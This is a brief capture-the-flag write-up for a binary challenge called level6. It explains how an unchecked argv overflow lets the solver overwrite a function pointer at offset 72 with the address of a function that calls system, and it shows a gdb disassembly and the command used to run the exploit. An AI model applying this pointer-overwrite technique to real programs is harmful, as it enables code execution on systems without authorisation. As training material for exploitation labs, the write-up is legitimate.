# level6

- here we have an exploit where the argv size is not checked and the return value is a fonction pointer

- the fonction pointer is set to the `m` fonction and we whant to point to `n`

- We can control the fonction pointer at index 72

- ```gdb
  (gdb) disass n
  Dump of assembler code for function n:
     0x08048454 <+0>:	push   %ebp
     0x08048455 <+1>:	mov    %esp,%ebp
     0x08048457 <+3>:	sub    $0x18,%esp
     0x0804845a <+6>:	movl   $0x80485b0,(%esp)
     0x08048461 <+13>:	call   0x8048370 <system@plt>
     0x08048466 <+18>:	leave
     0x08048467 <+19>:	ret
  End of assembler dump.
  ```

- We can put the addr of this fonction after index 72 (`0x8048454`)

- ```sh
  ./level6 `python /tmp/level6.py`
  ```
